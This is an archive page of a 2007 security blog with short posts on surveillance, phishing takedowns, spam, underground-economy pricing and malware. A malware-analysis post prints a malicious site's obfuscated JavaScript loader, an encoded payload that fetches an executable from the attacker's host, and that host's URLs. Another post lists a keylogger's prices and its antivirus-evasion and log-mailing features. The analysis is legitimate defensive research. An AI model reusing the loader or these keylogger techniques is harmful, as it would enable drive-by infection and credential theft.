Friday, March 30, 2007

Cyber Traps for Wannabe Jihadists

I guess that's what happens when you don't have a single clue on where the real conversation and recruitment is happening, so you decide to create your own controlled jihadi communities to monitor. A case study on false feeling of effectiveness in Australia :

"FEDERAL police are setting up bogus jihadist websites to track extremists who use cyberspace to recruit followers and plan attacks. The undercover operation, disclosed yesterday by Australian Federal Police Commissioner Mick Keelty, is an assault on arguably the most powerful weapon of the global jihadist movement, the internet. Mr Keelty said police were working closely with foreign governments and the military's Defence Signals Directorate. "We have worked with some foreign countries through our undercover program, establishing our own websites, to capture some of the activities that are going on on the internet," he told a security conference in Sydney."

"Some of the activities" will have absolutely nothing to do with the real situation, and even if someone bothers to open up a discussion on your second hand jihadi site, it'll be a classic example of a moron. Fighting for a share of the online jihadi traffic is so unpragmatic, unnecessary, time and resource consuming that you'd better rethink the entire idea, emphasize on intelligence data sharing with other countries in case you cannot monitor the emergence of local communications, and keep an eye on them.

Meanwhile, a talk on the street is heating up :
- Hello underaged kids, I see you're having trouble getting hold of some quality Russian vodka over here in front of that store, I can probably give you hand with this?
- Yes, please, please!!!
- Aha! Agent Temptation from the Thought Police here, you're busted for desiring to drink alcohol even without drinking it! Put your tongues on your head so I can see them!

In the long term we may actually have a real-life bomber confessing of visiting online jihad community before the plot took place, that, ooops, happens to be one of the fake ones. Now we have double ooops. Many other related posts to provide you with an overview of the big picture and a countless number of budget allocation myopia failures that emphasize on technological approaches to detecting radical jihadi propaganda, whereas cyber jihadists and future terrorists are getting efficient in generating "noise sites", ones your crawlers are so good at picking up.

IMSafer Now MySpace Compatible

MySpace, the world's most popular social networking site, and an online predator's dream come true has been actively discussed since the very beginning in respect to the measures News Corp's property takes to prevent child abuse through the site. Let's face the facts, of course underaged kids will confirm they're over 18/21 in order to use the site, and of course online predators will continue finding ways to socially engineer a online contact with the ultimate idea to meet in the physical world. Why? Because children provide way too much sensitive information in order to virtually socialize and meet new buddies, thus indirectly helping pedophiles pinpoint key "contact points" in the future. If you as a parent start paranoia-ing around, you'll end up with the wrong conclusion that the risks are not worth the benefits, totally forgetting that forbidden fruits taste much better and it's children we're talking about -- they break the established rules in principle. No matter the registration procedures in place, you cannot stop an online predator registering and communicating with children at the site, what you can do however is educating your children, and emphasizing on filtering not spying activities in order to protect them.

The team behind IMSafer, a service which I covered in a previous post, have realized the potential benefits of introducting a MySpace compatibility, and so it recently became a reality :

"IMSafer's updated language-analysis engine can scan individual MySpace postings for potentially dangerous, threatening or sexually explicit content, the company said. Users can download the tool from the company's Web site, said Brandon Watson, CEO and founder of the company. Traditional parental control software generally can filter and block Web sites but can't identify possible dangerous interactions on increasingly popular social networking sites such as MySpace, he said. While most sexual solicitations of children still come through instant messaging software, online predators are increasingly using MySpace to initiate contact with potential victims, Watson added."

Don't forget the bottom line, if you're in a fragile relationship with your kids, pretty much anyone online could take advantage of their vulnerable condition. The irony goes that people you've never met will show more respect to you than the people you actually fight to get respect from. From a children's perspective that's you parents! Here are several more articles worth going through, especially this post-event response to what's an internal problem to me.

Wednesday, March 28, 2007

Real Time Spam Shredding

Wednesday's portion of hahaha-ing. This is the work of a pragmatic genious, the revenge of the nerds or call it whatever you want the idea is simple - what gets detected as spam gets printed and shred in real-time for interactivity. How much would it cost for a Fortune 500 organization to implement such a feature, a "fortune" by itself for sure, but an anti-spam vendor looking to differentiate its headquarters might be interested in implementing such a system for their corporate clients to see while walking around.

"Spamtrap" is an interactive installation piece the prints, shreds and blacklists spam email. It interacts with spammers by monitoring several email addresses I have created specifically to lure in spam. I do not use these email addresses for any other communication. I post individual email addresses on websites and online bulletin boards that cause them to be harvested by spambots and then to start receiving spam. Because I know that all email sent to these email addresses are spam, I have set the installation to print and then shred each email as it arrives."

Read more about the Spamtrap in this blog. There's simply so much spam these days, you can even create large data sets in order to render surrealistic spam art paintings, no kidding.

Tuesday, March 27, 2007

You've Got Something in Your Eye

Or that's what the always getting bigger, Big Brother says :

"Avigilon's 16 megapixel cameras are the first surveillance cameras that can continuously monitor large fields of view while maintaining high levels of detail. In the past, security professionals have had to rely on opto-mechanical PTZ cameras for wide field of view surveillance and were forced to make a tradeoff between field of view and image detail. Avigilon's 16 megapixel cameras provide a superior solution for post incident investigation because they provide detailed images of the entire field of view, without the requirement of an operator to control the camera."

I like the press release debunking the idea of real-time incident prevention due to CCTV surveillance compared to historical performance and analyzing past events. Not that's it's not possible, but the investments are not worth the ROI, and if self-regulation is the single most visible return on investment here, that's a bad deal. But in reality, keep on living in a CCTV myopia world, where covering the "blind spot" of one camera gets covered by installing another one, and the "blind spot" of the second one gets covered by a third one. It's about time your CCTV expenditures start declining given reasonable metrics defining a successful investment appear soon.

Now let's hope these cameras never get installed in public restrooms, shall we?

Ghosts in the Keyboard

KeyGhost is a nasty type of hardware keylogger that if ignored as a concept can truly expose a lot of data, with one downsize - the logged data has to be retrieved physically in the very same fashion the keylogger got installed. Here's how the six-year-olds do it :

"A six-year-old girl has successfully hacked into the UK Parliament's computer system, installing a keylogger onto an MPs machine. Guildford MP Anne Milton agreed to leave her computer unattended for 60 seconds as part of a test of House of Commons IT security by the BBC's Inside Out programme. Brianagh, a schoolgirl from Winchester, took just a quarter of that time to install the keylogging software without being noticed. Such easily available applications record all the keystrokes made on a machine and can therefore be used to steal passwords, financial data and personal information."

The article starts by mentioning the software and ends up with a quote on the "device" itself. The story is a great wake up call, especially the six-year-old girl part, as it will position the computer system's security as an extremely weak one in the minds of the masses, no wait the tax payers. But age doesn't really matter here, it's the idea that the majority of insecurities have an outside-towards-inside trend, namely they come from the Internet, not from within as we see in this case. In case you're interested, there're already various business development activities in releasing a laptop based PCI card keylogger given the obvious incompatibilities with a PC.

Related posts:
USB Surveillance Sticks
Espionage Ghost Busters

Thursday, March 22, 2007

Take this Malicious Site Down - Processing Order..

Yet another pay-pal-secure-login.tld domain gets registered, and even more ironic in its directory listings you'll be able to digg out several other financial institutions and online companies logins, even competitors. Financial institutions cannot cope with the level of such registered domains and some -- even after reported to the usual abuse account -- remain active for weeks to come. So how do you protect these businesses and cash in between for doing so? Looks like RSA are diversifying their service from phishing hosting sites to malware hosting ones :

"EMC's RSA division plans to launch a new service next month that will help financial institutions take down Web sites associated with malicious Trojan Horse software. The service is planned as an extension to the FraudAction phishing takedown service already offered by RSA, said Louie Gasparini, co-chief technical officer with RSA's Consumer Solutions unit. "We're leveraging the same infrastructure we already have in place... and now we're focusing our attention on how Trojans work," he said. Gasparini said he expects financial services companies, auction sites, and online merchants to use the service. "It's really allowing the institution to better protect its customers," he said."

Can RSA really cash in by re-intermediating the current communication model, and most importantly do a better job? It can sure allow the targeted companies to focus on innovation and growth, not on online impersonation attacks so I find this a sound product line extension, but need more performance stats to offer valuable recommendations.

According to the latest Anti-Phishing.org report, the threatscape looks very favorable in respect to communicating with the major country hosting phishing sites - the U.S, followed by China and South Korea. In between companies diversifying their portfolios of services and products, there's one other thing to keep in mind and that's how can you achieve the same results in more cost effective way than the commercial propositions? And can you actually? Do you even have to dedicate financial resources to shut down these sites compared to educating your customers on how to use their brains? Ask yourself these questions before losing it in a budget allocation myopia. Something else to keep in mind - ISPs will also start getting interested in the idea of equal distribution of revenues given the sound business model.

Related posts:
The Phishing Ecosystem
Anti-phishing Toolbars - Can You Trust Them?
Google's Anti-phishing Black and White Lists

Tricking an UAV's Thermal Imagery

Give me a hug so that we become "thermally one" for the thermal paparazi to see. When you know how it works you can either improve, abuse or destroy it. Very interesting abuse of technology by the people knowing how it works :

"The Marines cuffed Awad and took him to a nearby bomb crater. At this point the drone approached for its first pass overhead. One of the group moved forward and dug a hole at the crater, while the others posed with Awad behind a wall. The recorded thermal imagery from the aircraft seemed to show troops watching an insurgent digging by the road, perhaps to place a bomb. After the drone had passed, the group moved Awad forward to the hole. But at this point the surveillance platform returned, so one of the Marines wrapped himself around Awad so as to create a single thermal signature, disguising the captive's presence."

If you're under thermal surveillance a cold shower's your invisibility coat if one's available. Wired has some photos on this story.

Wednesday, March 21, 2007

Zoom Zoom Zoom - Boom!

If you could only eradicate the radicalization of immature islamic youth over the Internet with the push of a button. Great surgical shot!

A Documentary on CCTVs in the U.K

Every breath you take, every move you make, I'll be watching you. Used to be a great song, but has a disturbing context these days. Nino Leitner's EveryStepYouTake documentary on the state of surveillance in the U.K will premier this month, and I suspect the full version will be made available for the world to see too :

"Trying to answer questions like these, Nino Leitner’s one-hour documentary “EVERY STEP YOU TAKE” digs deep into an entirely British phenomenon: nation-wide video surveillance. It features formal interviews with the surveillance researcher Professor Clive Norris, Deputy Chief Constable Andy Trotter from the British Transport Police, a representative of Britain’s largest civil rights group Liberty, a CCTV manager from a public local CCTV scheme, experts in the field of transport policing and many more. The surveillance reality in Britain is compared with another member of the E.U., Austria. Compared to the UK, it can be seen as a developing country in terms of CCTV, but just as elsewhere all over the world, politicians are eager to extend the surveillance gaze."

Here's an animation to help you explain what surveillance means to your cat, another one fully loaded with attitude, and let's not exclude the big picture.

Related posts:
London's Police Experimenting with Head-Mounted Surveillance Cameras
Head Mounted Surveillance System
Eyes in London's Sky - Surveillance Poster
External links

Unsigned Code Execution in Windows Vista

Nitin Kumar and Vipin Kumar are about to present the Vbootkit at the upcoming Blackhat and HITB cons :

"We have been recently researching on Vista. Meanwhile, our research for fun lead us to some important findings. Vista is still vulnerable to unsigned code execution.vbootkit is the name we have chosen ( V stands for Vista and boot kit is just a termed coined which is a kit which lets you doctor boot process).vbootkit concept presents how to insert arbitrary code into RC1 and RC2, thus effectively bypassing the famous Vista policy for allowing only digitally signed code to be loaded into kernel. The presented attack works using the custom boot sectors.Custom boot sector are modified boot sectors which hook booting process of the system & thus, gains control of the system. Meanwhile, the OS continues to boot and goes on with normal execution."

Vulnerabilities are an inevitable commodity, they will always appear and instead of counting them on an OS or software basis, consider a vendor's response time while following the life of the security threat. I never actually liked the idea of an insecure OS, to me there're well configured and badly configured OSs in respect to security, but then again if you're a monocultural target the way Microsoft is, you'll always be in the zero day spotlight. A security breach will sooner or later hit your organization, don't talk, act and pretend you're 100% secure because you cannot be. Instead a little bit of proactive measures balanced with contingency planning to minimize the impact is what should get a high priority in your strategy. Here's a related post.

Cartoon courtesy of Userfriendly.org

Tuesday, March 20, 2007

A Fortune 500 Blogosphere? Not Yet

Enterprise 2.0 is slowly gaining grounds and you cannot deny it despite top management's neutral position on yet another major "Reengineering of the Corporation". Supply chain management was perhaps among the first departments to really utilize the power of real-time information, and interoperable data standarts -- a mashup-ed ecosystem -- but improving your employees productivity through Web 2.0 tools such as intranet blogs and wikis remains just as unpopular as actual Fortune 500 companies blogging? But how come? Lack of evangelists? Not at all. There's one minor obstacle, you cannot teach an old dog new tricks, unless of course you dedicate extra investments into training him, which is exactly what I feel is happening at the corporate stage - everyone's patiently waiting for the concepts to mature before training and implementation happen for real. What's the current attitude towards external Web 2.0 activities? A Fortune 500 blogosphere isn't emerging as fast as the mainstream one is according to the Fortune 500 Business Blogging Wiki :

"a directory of Fortune 500 companies that have business blogs, defined as: active public blogs by company employees about the company and/or its products. According to our research, 40 (8%) of the Fortune 500 are blogging as of 10/05/06. The navigation sidebar to the right lists all the Fortune 500 companies. The list below are the ones that we've found so far that have public blogs as defined above. Please help us by entering data on those we've missed. ONLY Fortune 500 companies, please. If you're not sure if it's on the F500 list (it includes US companies only), check the sidebar. If it's not there, consider adding it to the Global 1,000 Business Blogging page instead."

I think the main reason behind this are the inevitable channel conflicts that will arise from let's say Pfizer's blogging compared to using the services of their traditional advertising and PR agencies -- I also imagine a links density analysis of their blog indicating the highest % of links pointing to Erowid.org. But ask yourself the following, what if these very same agencies start offering bloggers-for-hire in their portfolio of services, would the big guys get interested then? Or when will they start understanding the ROI of blogging?

Video on Analyzing and Removing Rootkits

Courtesy of WatchGuard part three of their malware analysis series walks you through various commercial and free utilities for detecting and removing rootkits :

"In this episode, Corey and his Magic White Board show how kernel mode rootkits work. Also covered: recommended tools and techniques for detecting and removing rootkits."

Jihadists Using Kaspersky Anti Virus

I wonder what are the low lifes actually protecting themselves from? Malware attacks in principle, or preparing to prevent a malware infection courtesy of an unamed law enforcement agency given their interest in coding malware :

"German police officials have expressed interest in developing software tools to help them surveil computer users who may be involved in crime. The tools might include types of software similar to those used in online fraud and theft schemes, such as programs that record keystrokes, logins and passwords. Security companies, however, are asserting that they wouldn't make exceptions to their software to accommodate, for example, Trojan horse programs planted by law enforcement on users' computers."

This is a very contradictive development that deserves to be much more actively debated around the industry than it is for the time being. Law enforcement agensies and intelligence agencies have always been interested in zero day vulnerabilities and firmware infections, thus gaining a competitive advantage in the silent war. Among the most famous speculations of an intelligence agency using malicious code for offensive purposes is the infamous CIA infection/logicbomb of Russian gas pipeline :

"While there were no physical casualties from the pipeline explosion, there was significant damage to the Soviet economy. Its ultimate bankruptcy, not a bloody battle or nuclear exchange, is what brought the Cold War to an end. In time the Soviets came to understand that they had been stealing bogus technology, but now what were they to do? By implication, every cell of the Soviet leviathan might be infected. They had no way of knowing which equipment was sound, which was bogus. All was suspect, which was the intended endgame for the operation. The faulty software was slipped to the Russians after an agent recruited by the French and dubbed "Farewell" provided a shopping list of Soviet priorities, which focused on stealing Western technology."

Excluding the spy thriller motives, nothing's impossible the impossible just takes a little while, and the same goes for SCADA devices vulnerabilities and on purposely shipping buggy software. Anti virus vendors will get even more pressure trying to protect their customers from not only the malware released by malware authors, but also from the one courtesy of law enforcement agencies. Cyber warfare is here to stay, no doubt about it, but using malware to monitor suspects will perhaps prompt them to keep an eye on the last time their AV software got updated, and still keep pushing the update button in between.

ASCII Art Spam

A spammer's biggest trade off - making it through anti-spam filters doesn't mean the email receipt will even get the slightest chance of understanding what he's about to get scammed with.

"We have seen SPAM using ASCII ART in order to avoid being detected by antispam filters. Most of the times, they try to show different words (Viagra, etc.) using this technique, but this is the first time I have seen them showing a picture. It is not a very high quality one, but I’ve tried it with some different antispam filters and they have been fooled."

Here's an old school ASCII generator you can play around with, and a related image from a previous post on overperforming spammers.

Monday, March 19, 2007

The Underground Economy's Supply of Goods

Symantec (SYMC) just released their latest Internet Security Threat Report, a 104 pages of rich on graphs observations, according to the data streaming from their sensor network :

"Volume XI includes a new category: “Underground Economy Servers”. These are used by criminals and criminal organizations to sell stolen information, including government-issued identity numbers, credit cards, bank cards and personal identification numbers (PINs), user accounts, and email address lists. To reduce facilitating identity theft, organizations should take steps to protect data stored on or transmitted over their computers. It is critical to develop and implement encryption to ensure that any sensitive data is protected from unauthorized access."

In between their coverage on various segments such as vulnerabilities, phishing, spam, and yes malware despite that I'm having my doubts on SMTP as the major propagation vector on a worldwide scale, I came across to a nice figure summarizing their encouterings while browsing around various forums and web sites.

The question is - why are these underground goods cheaper than a Kids' menu at McDonalds as I've once pointed out at O'Reilly's Radar post on spamonomics? Because in 2007 we can easily speak of "malicious economies of scale" thus, profit margin gains despite the ongoing zero day vulnerabilities cash bubble at certain forums, doesn't seem to be that very important. So can we therefore conclude that greed isn't the ultimate driving force, but trying to get rid of the stolen information in the fastest way possible in between taking into consideration its dissapearing exclusiveness with each and every minute? The principle goes that a dollar earned today is worth more than a dollar earned tomorrow, but how come? Simple, by tomorrow the exclusiveness of your goods might by just gone, because the affected parties detected the leaks and took actions to prevent the damage.

Issues to keep in mind regarding the graph:
-
Harvested spam databases have been circulating around for years and so turned into a commodity, for instance, I often come across geographically segmented databases or per email provider segmented ones, not for sale, but for free. So how come the "good" is offered for free? It's obviously fine for the "good" to be offered for free when there's a charge for service, the service of verifying the validity of the emails, the service of encoding the message in a way to bypass anti spam filters, and the service of actually sending the messages

-
Where's the deal of a malicious party when selling an online banking account with a $9,900 balance for just $300? For me, it's a simple process of risk-forwarding to a party that is actually capable of getting hold of the cash

-
Yahoo and Hotmail email cookies per piece? Next it will be an infected party's clickstream for sale, and you'll have the malicious parties competing with major ISPs who are obviously selling yours for the time being.

-
Compromised computers per piece? Not exactly. Entire botnets or the utilization of the possible services offered on demand for a price that's slightly a bit higher than the one pointed out here.

Psychological imagation is just as important as playing a devil's advocate to come up with scenario building tactics in order to protect your customers and yourself from tomorrow's threats.

Related images:
-
surveying potential buyers of zero day vulnerabilities in order to apply marginal thinking in their proposition
- advertisement for selling zero day vulnerabilities
- listing of available exploits
- zero day vulnerabilities shop, I'm certain it's a PHP module that's currently hosted somewhere else
- the WebAttacker toolkit
- The RootLauncher
- The Nuclear Grabber and geolocated infections-- site dissapeared already

Subconscious Search Monopoly Sentiments

And hey, that's from someone attending the Microsoft MVP for N-th time :

"I was invited to attend the Microsoft MVP Summit last week. If you want to know what the Summit is about or what a MS MVP is, Google is your friend."

Microsoft's MVP is a great corporate citizenship tool, whereas empowering and crediting the individual on a wide scale compared to internal reputation benchmarking is an indirect use of the "act as an owner" management tactic -- implement it. Supporting existing standarts -- look up interoperability -- benefits us all, reinventing the wheel without an unique vision besides ever increasing (projected) profit margins, wouldn't even benefit the company in the long term.

If you truly want to disrupt, disrupt by first (legally) taking the advantage of using someone else's already developed foundations to do so, the rest is attitude and hard to immitate competitive advantages. Good brainstorming questions in Anil's post whatsoever.

Spam Comments Attack on TechCrunch Continuing

In a previous post I commented on O'Reilly.com's war on spam according to their statistics, and thought you might find the most recent TechCrunch blog spam stats they've recently provided, informative as well :

"On January 4 we reported that the Akismet filter had stopped a million spam comments from reaching TechCrunch. At that point we’d been using it for about nine months. The number of blocked spam comments is now two million, just ten weeks later. That works out to about 15,000 spam comments hitting TechCrunch every day. If we did not have Akismet, we couldn’t allow anonymous commenting here on TechCrunch. We used to go through all spam comments to pick out the occasional false positive and accept it. Now, there are just too many to go through. All comments marked by Akismet as spam get deleted almost immediately."

I turned blog comments off quite a while ago and to be honest, the best comments, recommendations and tips, as well as people I've met through this blog, I received over email and backlinks. Keep 'em coming! Moreover, it's not just the inability of service providers to keep up with the aggresive generation of splogs, but malicious parties are already exploiting some of the fancy features that make blogs so flexible when it comes to personalization and social networking. Next time Fortinet will come up with another advisory, this time discussing MySpace so consider it as a cyclical shift from one provider to another depending on the current defenses in place -- blackhat SEO.

Personal Data Security Breaches Spreadsheet

Some stats try to emphasize on the number of people affected while forgetting the key points I outlined in a previous post related to why we cannot measure the real cost of cybercrime, and yes, duplicates among the affected people in any of the statistics available. The number of people affected will continue to rise, but that's not important, what's important is to identify the weakest link in this process, and for the time being, you're a "data hostage" in order to enjoy your modern lifestyle -- ever asked yourself what's gonna happen with your digital data after you're gone?

Spreadsheet nerds, here's something worth taking the time to around with, most importantly this huge dataset debunks the common myth of hackers taking the credit for the majority of personal data security breaches, whereas as you can see in the figures, on the majority of occasions -- and it's an ongoing trend -- companies themselves should get into the spotlight :

"On average, in 2005 personal records were compromised at a rate of 5.2 million a month. On average, in 2005 personal records were compromised at a rate of 5.8 million a month. Assuming a similar rate of growth, by November or December this year we we should cross the 2.0 billion mark. This is a conservative estimate because many of the news stories we archived were conservative on their own estimates of how many records were lost in particular incidents, and because a small number of incidents are reported without details of how many personal records were compromised.

View figures and tables of this paper as a *.pdf. View pre-publication draft of paper as a *.pdf. View dataset of incidents as a *.xls. View University of Washington Press office news release on this research."

Graphic presenting the risk of identity theft in the U.S only, based on the severity of data breaches, courtesy of the Danny Dougherty.

Complexity and Threats Mind Mapping

The folks at Security-Database.com -- who by the way expressed their excitement over my blog -- just released an outstanding mind mapping graph on the most common firefox security extensions used for various purposes starting from information gathering, and going up to data tampering :

"FireCAT is based upon a paper we wrote some weeks before (Turning firefox to an ethical hacking platform) and downloaded more than 25 000 times. We also thank all folks that encouraged us and sent their suggestions and ideas to make this project a reality. This initial release is presented as a mindmap and we are open to all your suggestions to make it a really good framework for all the community of security auditors and ethical hackers. We will make a special page for this framework soon to let you monitor this activity."

Great idea, reminds of Ollie Whitehouse's excellent mind mapping of mobile device threats. The semantics of security when applied in a visualized manner have the potential to limit the "yet another malware variant in the wild" type of news articles, or hopefully help the mainstream media break out of the "echo chamber" and re-publishing myopia, thus covering the basics.

Anyway, which is the most useful tool you'll ever encounter? It's called experience. Which is the most important threat to keep an eye on? It's your inability of not knowing what's going on at a particular moment, lack of situational awareness.

Wednesday, March 14, 2007

Threats of Using Outsourced Software - Part Two

Continuing the coverage on the U.S government's overall paranoia of using outsourced software on DoD computers, even hardware -- firmware infections are still in a spy's arsenal only -- in a recent move by the Defense CIO office a tiger team has been officially assigned to audit the software and look for potential backdoors :

"The Pentagon is fielding a task force charged with testing software developed overseas, according to a Defense Department official. The “tiger team,” organized within the Defense CIO’s office, is ready to move to the implementation stage, said Kristen Baldwin, deputy director for software engineering and systems assurance in the Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics. Baldwin spoke yesterday at the DHS-DOD Software Assurance Forum in Fairfax, Va. “Tiger team” is a software-industry term for a group that conducts penetration testing to assess software security. “Success means they understand where their focus needs to be and how to prioritize their efforts,” Baldwin said. “They understand the supply-chain impact on systems engineering, and are ready to move forward in an effort to mitigate assurance risk.”"

There's another perspective you should keep in mind. Looking for backdoors is shortsighted, as the software may come vulnerabilities-ready, so prioritizing whether it's vulnerabilities or actualy backdoors to look for will prove tricky. The use of automated source code auditing may prove valuable as well, but taking into consideration the big picture, if you were to track the vulnerabilities that could act as backdoors in U.S coded software -- taking Windows for instance -- compared to that of foreign software, you'll end up with rather predictable results.

The bottom line, does shipping an insecure software has to do with source code vulnerabilities, or should the threat be perceived in relation to backdoor-shipped software? The true ghost in the shell however remain the yet undiscovered vulnerabilities in the software acting as vectors for installing backdoors, not the softwared itself shipped backdoor-ready. Meanwhile, are stories like these a violation of OPSEC by themselves? I think they are.

Monday, March 12, 2007

Timeline of Iran's Nuclear Program

Iran's a rising star these days. It's not just that the country recently launched it's first missile into space despite efforts of the international community to ban its nuclear program, got caught into obtaining sensitive military technology, is currently helping the enemies(Hezbollah) of its enemies(the U.S) but also, have Russia enriching their uranium in between legally supplying them with technology and upgrade parts the U.S put an embargo on -- business as usual. Here's a very in-depth and informative timeline of Iran's entire nuclear program saga :

"The Bush Administration has almost certainly not approved the timing of military operations against Iran, and consequently any projection of the probable timing of such operations is neccessarily speculative. The election of Mahmoud Ahmadi-Nejad as Iran's new president would appear to preclude a negotiated resolution of Iran's nuclear program. The success of strikes against Iran's WMD facilities requires both tactical and strategic surprise, so there will not be the sort of public rhetorical buildup in the weeks preceeding hostilities, of the sort that preceeded the invasion of Iraq. To the contrary, the Bush Administration will do everything within its power to deceive Iran's leaders into believing that military action is not imminent."

Here's another timeline, this time of U.S-Iran contracts from 1979 until today.

Google Maps and Privacy

I thought I've seen the best close-ups from Google Maps in the top 10 naked people on Google Earth, but this screenshot is spooky as the guy is even looking straight into the sky which makes it even more interesting catch. It proves ones thing, Google are capable of providing high-res satellite imagery, which they aren't on a mass scale for the time being. Shall we speculate on the possible reasons why is this guy looking above, remotely controlled aerial surveillance device, but what's the relation with Google Maps whatsoever? More at Google Blogoscoped, as well as in previous posts related to the topic.

Touching the Future of Productivity

Visualization in military brienfings and intelligence gathering has been a daily lifestyle of analysts for years, but combining visualization and touchscreens makes it the perfect combination to boost productivity. We're very near to entering the stage where VR will not only save lifes in a war zone, but also allow a skilled and hard to replace warrior to operate a device while enjoying his Coke back home. Great demonstration. Via Defensetech.

Go through related posts on visualization and its future impact on information security and intelligence as well.

Sunday, March 11, 2007

Ballistic Missile Defense Engagement Points

Outstanding animation covering pretty much all of the current engagement points in case a missile is fired from anywhere across the world, total syncronization between air, land and naval force, and I must say the background music is excellent too.



In a previous post, Who Needs Nuclear Weapons Anymore? I provided my reflection on the overal shift of threats nowadays compared to the ones back in the Cold War days you may informative, as well as an essay I wrote back in 1998. Cryptome's Eyeballing of Missile Defense is also worth going through.

Saturday, March 10, 2007

Vladuz's Ebay CAPTCHA Populator

Nice slideshow courtesy of eWeek providing various screenshots related to Vladuz's impersonation attacks on Ebay :

"And whether or not Vladuz is responsible for writing a tool to automatically skim eBay customers accounts and thus cause sharp spikes in bogus listings being taken down and relisted multiple times a day, he or she has the mythic reputation at this point to be credited as the cause."

Compared to diversifying its targets, permanently sticking to Ebay as the main target is already prompting the Web icon to put more efforts into tracking him down. Last year for instance, automated bots exploited Ebay's CAPTCHA and started self-recommending each other, but with Vladuz's Ebay CAPTCHA Populator, improving the quality of Ebay's authentication process should get a higher priority than tracking him down as another such tool will follow from someone else out there.

Photoshoping Your Reality

It's not just a stereotyped beauty model, advanced image editing tools and techniques can make you believe in, but they can also influence your understand of reality too as you can see in Wired's famous altered photos collection :

"A picture is worth a thousand words, and Photoshop and similar tools have made it easier than ever to make those words fib. But while computers enable easier and better photo manipulation, it is hardly a new phenomenon. Here is a sampling of some of the more famous altered photographs from the last century."

Here's a free service letting you fake photos. Here's another one as well as a variant of mine in relation to a previous post.

Shots from the Malicious Wild West - Sample Three

Keyloggers on demand, the so called zero day keyloggers ones created especially to be used in targeted attacks are something rather common these days. Among the many popular ones that remained in service and has been updated for over an year is The Rat! Keylogger. Here are some prices in virtual WMZ money concerning all of its versions :

The Rat! 7.0XP - 29 WMZ
The Rat! 6.0XP/6.1 - 22 WMZ
The Rat! 5.8XP - 15 WMZ
The Rat! 5.5XP - 13 WMZ
The Rat! 5.0XP - 9 WMZ
The Rat! 4.0XP - 8 WMZ
The Rat! 3.xx - 7 WMZ
The Rat! 2.xx - 6 WMZ

An automated translation of its features :

For the installation to the machines with the operating systems Windows xp, Windows 2000 and on their basis. Finale - apotheosis! Let us recall again, for which we love our rodent:
- the size of file- result is record small - 13 312 bytes in the nezapakovannom form (with the packing with use FSG, 6 793 bytes!).
- not it detektitsya as virus by antiviryami.
- it follows the buffer of exchange.
- the system of invisibility and circuit of fayervola.
- the fixation of pressure you klavish' in the password windows and the console.
- the sending of lairs on e-mail, with the support to autentifikatsii RFC - 2554.
- the encoding of dump.
- tuning the time of activation and time of stoppage
- removal in the time indicated without it is trace and reloading.

Digital fingerprints will follow as soon as I finish bruteforcing the password protected archives.

Shots from the Malicious Wild West - Sample Two

Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in an AV software itself.

Compared to the common wisdom of malware authors being self-efficient and coming up with packers by themselves, we've already seen cases where investments in purchasing commercial anti-debugging software is considered. You may find these test results of various anti virus software against packed malware informative, which as a matter of fact truly back up my experience with the winning engines and their performance in respect to packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1

Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have an URL spreading malware through redirectors and the natural javascript obfuscation :

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following :




var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3,
chr1; var enc4, enc2, enc1, enc3; var i = 0; input = input.replace(/[^A-Za-z0-9\
+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.
indexOf(input.charAt(i++)); chr1 = (enc1 <<>> 4); chr2 = ((enc2 & 15)
<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while
(i < input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.

Deobfuscating the javascript we get to see where the binary is :

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the following results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signatures based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come with another binary that all major AV vendors detect, but the second tier ones doesn't. Host based IPS based protection and behaviour blocking, and the actual prevention of loading the script is the way to avoid the exploitation of the flaws in signatures based scanning protection.

Friday, March 09, 2007

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

